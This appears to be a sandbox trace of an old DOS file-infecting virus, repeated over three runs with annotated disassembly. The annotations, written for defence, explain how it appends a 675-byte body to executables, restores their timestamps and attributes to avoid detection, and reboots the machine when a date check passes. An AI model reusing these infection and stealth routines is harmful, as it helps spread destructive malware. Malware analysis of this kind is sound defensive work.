2018-12-25T11:59:42.901158052Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.902078389Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:42.905963641Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:42.909688428Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:42.916274676Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:42.923909561Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:42.92801923Z 62 PC: 12b51 | Close file
2018-12-25T11:59:42.929181422Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:42.951792025Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:42.963584884Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:42.971026208Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:42.972607595Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Emulator window at the return from INT 21h AH=2Ch (Get time; DH = seconds):
; tail of the per-file infection routine (0x12c1b-0x12c41) plus two helpers
; (0x12c42 seek, 0x12c4b set-DTA, cut off). The cmp on the log line above tests
; DH == 0. The host's saved time/date and attribute byte are put back here, so
; timestamp-based change detection will not flag the modified file.
0x12c1e: je 0x12c17                         ; seconds == 0: branch back to 0x12c17 (before this window; presumably re-issues Get time until DH != 0)
0x12c20: mov byte ptr [bp + 0x3a5], dh      ; store the non-zero seconds byte at bp+0x3a5 (looks like a per-copy key/seed; its use is outside this window)
0x12c24: call 0x12c9d                       ; routine not shown; the next logged call is the 675-byte write at PC 12cf9, i.e. inside it
0x12c27: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date/time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]      ; CX = saved time word
0x12c2e: mov dx, word ptr [bp + 0x41a]      ; DX = saved date word; offsets fit a find-first DTA at bp+0x402 (inferred, confirm)
0x12c32: int 0x21                           ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e                       ; INT 21h AH=3Eh: close handle (the handle register is set outside this window)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]      ; CX = saved attribute byte
0x12c3e: call 0x12c5a                       ; helper not shown; the trace logs "Get or set file attributes" at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42                       ; helper: INT 21h AH=42h move file pointer; AL (origin) is set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx                         ; offset CX:DX = 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a                       ; start of the set-DTA helper (INT 21h AH=1Ah); the rest is past the window
2018-12-25T11:59:42.978553492Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:42.987325675Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:42.989104008Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.005801786Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.018853799Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.021671305Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.029224617Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.035528783Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.037228136Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.047471429Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.05481298Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.057420547Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.059030314Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.061610559Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.069798081Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.071935704Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.079466432Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.090106343Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.093307157Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.100516831Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.112734106Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.114896382Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.12562177Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.132016898Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.134708502Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.136887515Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.139446492Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.14782653Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.150947083Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.15859123Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.168211817Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.172125004Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.178642516Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.184963594Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.187195571Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.197077512Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.203902311Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.20795891Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.209697013Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.212529117Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.223340228Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.225342653Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.233867403Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.244558214Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.247582399Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.254408786Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.261767946Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.264167304Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.268794898Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.278458795Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.281802385Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.284254937Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.287272593Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.301434138Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.302928798Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.30464841Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.309393333Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.319089177Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.325514623Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.332272959Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.334401928Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.34405619Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.351800337Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.354469036Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.355793657Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.358840924Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.378914142Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.38031767Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.388593604Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.398642812Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.401170996Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.407976381Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.414504067Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.416239145Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.42617666Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.432731333Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.435439736Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.437538033Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.440343529Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.448614212Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.450947384Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.458847263Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.4688218Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.472639433Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.480186872Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.486530425Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.489495697Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.492110373Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:43.496342218Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
; Emulator window at the return from INT 21h AH=2Ah (Get date: AL = day of week
; with 0 = Sunday, DH = month, DL = day). 0x12ac6-0x12adf is a date-triggered
; payload (forced restart); 0x12ae0 onward restores the INT 24h vector, the
; working directory and the DTA. The cmp on the log line above tests AL == 4
; (Thursday).
0x12ac8: jne 0x12ae0                        ; not Thursday: skip the payload. In this run it was skipped (next logged call is Set interrupt vector at PC 12ae9)
0x12aca: cmp dh, 0xe                        ; DH is the month (1-12) from Get date, so "above 14" cannot hold
0x12acd: ja 0x12ae0                         ; never taken as written; a day-of-month test (DL) may have been intended (unconfirmed)
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax                         ; DS = 0040h, the BIOS data area
0x12ad4: mov word ptr [0x72], 0             ; 0040:0072 reset flag cleared (not the 1234h warm-boot value)
0x12ada: ljmp 0xffff:0                      ; far jump to the x86 reset entry FFFF:0000, so the machine restarts
0x12adf: retf                               ; not reached after the far jump
0x12ae0: mov ax, 0x2524                     ; INT 21h AH=25h set vector, AL=24h (decimal 36): the DOS critical-error handler. The log's "AKA 'Set random record number'" is the name of INT 21h function 24h, not of this interrupt
0x12ae3: lds dx, ptr [bp + 0x446]           ; DS:DX = far pointer stored at bp+0x446 (presumably the handler saved by the Get interrupt vector call at the start of the trace)
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds                             ; DS = CS again, since lds overwrote DS
0x12aeb: lea dx, word ptr [bp + 0x3c2]      ; DS:DX = path buffer at bp+0x3c2 (presumably filled by the earlier Get current directory call)
0x12aef: mov ah, 0x3b                       ; INT 21h AH=3Bh: change directory
0x12af1: int 0x21
0x12af3: mov dx, 0x80                       ; offset 80h, the default DTA location in the PSP
0x12af6: call 0x12c4b                       ; set-DTA helper (the trace logs Set disk transfer address at PC 12c4f)
0x12af9: cmp sp, 0x4b50                     ; window ends here; the purpose of this comparison is not visible
2018-12-25T11:59:43.499078883Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.500334925Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.502254482Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:42.913599955Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:42.915198313Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.916227646Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:42.917242866Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:42.920522468Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:42.926219487Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:42.937344209Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:42.944204283Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:42.950618713Z 62 PC: 12b51 | Close file
2018-12-25T11:59:42.952412942Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:42.967588428Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:42.974645512Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:42.977595798Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:42.979407798Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
; Emulator window at the return from INT 21h AH=2Ch (Get time; DH = seconds):
; tail of the per-file infection routine (0x12c1b-0x12c41) plus two helpers
; (0x12c42 seek, 0x12c4b set-DTA, cut off). The cmp on the log line above tests
; DH == 0. The host's saved time/date and attribute byte are put back here, so
; timestamp-based change detection will not flag the modified file.
0x12c1e: je 0x12c17                         ; seconds == 0: branch back to 0x12c17 (before this window; presumably re-issues Get time until DH != 0)
0x12c20: mov byte ptr [bp + 0x3a5], dh      ; store the non-zero seconds byte at bp+0x3a5 (looks like a per-copy key/seed; its use is outside this window)
0x12c24: call 0x12c9d                       ; routine not shown; the next logged call is the 675-byte write at PC 12cf9, i.e. inside it
0x12c27: mov ax, 0x5701                     ; INT 21h AX=5701h: set file date/time (CX = time, DX = date)
0x12c2a: mov cx, word ptr [bp + 0x418]      ; CX = saved time word
0x12c2e: mov dx, word ptr [bp + 0x41a]      ; DX = saved date word; offsets fit a find-first DTA at bp+0x402 (inferred, confirm)
0x12c32: int 0x21                           ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e                       ; INT 21h AH=3Eh: close handle (the handle register is set outside this window)
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]      ; CX = saved attribute byte
0x12c3e: call 0x12c5a                       ; helper not shown; the trace logs "Get or set file attributes" at PC 12c63 right after
0x12c41: ret
0x12c42: mov ah, 0x42                       ; helper: INT 21h AH=42h move file pointer; AL (origin) is set by the caller
0x12c44: xor cx, cx
0x12c46: xor dx, dx                         ; offset CX:DX = 0
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a                       ; start of the set-DTA helper (INT 21h AH=1Ah); the rest is past the window
2018-12-25T11:59:42.982164188Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:42.990862271Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:42.992510385Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.000751254Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.012996882Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.015683124Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.022632998Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.028740986Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.030447676Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.040996321Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.047775006Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.050379809Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.05206436Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.054501924Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.062915946Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.064906461Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.072930178Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.084357296Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.087691941Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.094172755Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.100533637Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.103105493Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.113318081Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.119711295Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.122689925Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.124050038Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.126429431Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.135168619Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.137187344Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.144652751Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.154173829Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.157354707Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.163613859Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.16982596Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.173060815Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.182795981Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.194474208Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.201431794Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.202969401Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.205400531Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.214020568Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.216056466Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.223540316Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.23401803Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.236696433Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.243266625Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.250586283Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.252557091Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.256979372Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.262806623Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.265550111Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.26690879Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.270180462Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.284175007Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.285647642Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.288127252Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.29315002Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.296044546Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.303630665Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.309124407Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.310439732Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.319862708Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.327017788Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.329777257Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.332092632Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.334576796Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.343403146Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.347472079Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.354829753Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.360915594Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.363686055Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.370113109Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.37626122Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.378509188Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.388722519Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.395739014Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.399328528Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.400685974Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.403329563Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.413053367Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.414536371Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.421960006Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.431738054Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.43438803Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.440807463Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.447198801Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.449149154Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.45150553Z 59 PC: 12ac0 | Change current directory
; Disassembly window the sandbox printed at the return address of the "Get date"
; call logged on the next row (16-bit real-mode DOS code, Intel operand order).
; It shows a date-gated branch followed by the clean-up path taken in this run.
; Defensive takeaway: the gated path ends in a jump to the CPU reset entry point,
; so behaviour depends on the system date; a sandbox run with a pinned clock
; (see the JSON line after this log) exercises only one side of the branch.
2018-12-25T11:59:43.455699032Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4 ; AL = day of week from INT 21h/AH=2Ah (0 = Sunday, so 4 = Thursday)
0x12ac8: jne 0x12ae0 ; any other weekday: skip to the clean-up path
0x12aca: cmp dh, 0xe ; DH = month as returned by AH=2Ah
0x12acd: ja 0x12ae0 ; unsigned "above 14" cannot hold for a valid month; NOTE(review): may have been meant for DL (day of month) - confirm
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0 ; 0040:0072 is the BIOS reset flag (1234h requests a warm boot); 0 leaves a full power-on self test
0x12ada: ljmp 0xffff:0 ; far jump to FFFF:0000, the reset entry point: the machine reboots
0x12adf: retf ; not reached after the far jump above
; --- clean-up path; the next logged call is at PC 12ae9, so this run branched here ---
0x12ae0: mov ax, 0x2524 ; AH=25h set interrupt vector, AL=24h (decimal 36) = INT 24h, the DOS critical-error handler; the log's "Set random record number" label is the name of INT 21h function 24h, not of this vector
0x12ae3: lds dx, ptr [bp + 0x446] ; DS:DX = far pointer stored at bp+0x446; presumably the handler saved by the "Get interrupt vector" call at PC 12a8e
0x12ae7: int 0x21 ; logged as "Set interrupt vector" (PC 12ae9)
0x12ae9: push cs
0x12aea: pop ds ; DS = CS again after LDS changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2] ; DS:DX = path buffer at bp+0x3c2; presumably filled by "Get current directory" at PC 12aaa
0x12aef: mov ah, 0x3b ; INT 21h AH=3Bh: change current directory
0x12af1: int 0x21 ; logged as "Change current directory" (PC 12af3)
0x12af3: mov dx, 0x80 ; offset 80h; NOTE(review): in a .COM program this is the default DTA inside the PSP - confirm DS
0x12af6: call 0x12c4b ; 0x12c4b begins with mov ah, 0x1a (set disk transfer address); logged at PC 12c4f
0x12af9: cmp sp, 0x4b50 ; window ends here; purpose of this compare is not visible
2018-12-25T11:59:43.458330546Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.460120638Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.461992651Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.041190168Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.042290947Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.044715298Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.046160523Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.049194267Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.056389467Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.062838115Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.070086129Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.078042019Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.080058108Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.100111023Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.107338889Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.114801903Z 66 PC: 12c4a | Move file pointer
; Disassembly window the sandbox printed at the return address of the "Get time"
; call logged on the next row (16-bit real-mode DOS code, Intel operand order).
; It covers the tail of the per-file routine plus two small INT 21h helpers.
; Defensive takeaway: the file's date/time and attributes are written back after
; the 675-byte write, so mtime/attribute checks will not flag the modified file;
; compare file size or a content hash against a known-good copy instead.
2018-12-25T11:59:43.116172213Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0 ; DH = seconds returned by INT 21h/AH=2Ch
0x12c1e: je 0x12c17 ; seconds == 0: branch back to 0x12c17 (outside this window; presumably re-issues Get time)
0x12c20: mov byte ptr [bp + 0x3a5], dh ; keep the non-zero seconds byte at bp+0x3a5; NOTE(review): looks like a per-copy seed, confirm in 0x12c9d
0x12c24: call 0x12c9d ; body not shown; the "Write 675 bytes" row (PC 12cf9) is logged before control returns here
0x12c27: mov ax, 0x5701 ; INT 21h AX=5701h: set file date/time on the handle in BX
0x12c2a: mov cx, word ptr [bp + 0x418] ; CX = word at bp+0x418, passed as the file time
0x12c2e: mov dx, word ptr [bp + 0x41a] ; DX = word at bp+0x41a, passed as the file date
0x12c32: int 0x21 ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e ; INT 21h AH=3Eh: close the handle in BX
0x12c36: int 0x21 ; logged as "Close file" (PC 12c38)
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417] ; CX = byte at bp+0x417; offsets 0x417/0x418/0x41a are spaced like the attr/time/date fields of a find-first DTA record - TODO confirm
0x12c3e: call 0x12c5a ; body not shown; the next "Get or set file attributes" row is at PC 12c63, presumably inside this routine
0x12c41: ret
; --- helper: INT 21h AH=42h (move file pointer) with offset CX:DX = 0; AL (origin) is left to the caller ---
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21 ; logged as "Move file pointer" (PC 12c4a)
0x12c4a: ret
; --- helper start: AH=1Ah is INT 21h "Set disk transfer address" (logged at PC 12c4f); the window ends here ---
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.118784507Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.128946166Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.130655185Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.139354864Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.151182374Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.154184097Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.162210409Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.170114084Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.172719252Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.183734256Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.191146243Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.194331494Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.195648308Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.198189238Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.208469964Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.210174559Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.218527681Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.230239915Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.233137327Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.240261263Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.247750664Z 62 PC: 12b51 | Close file (See above)
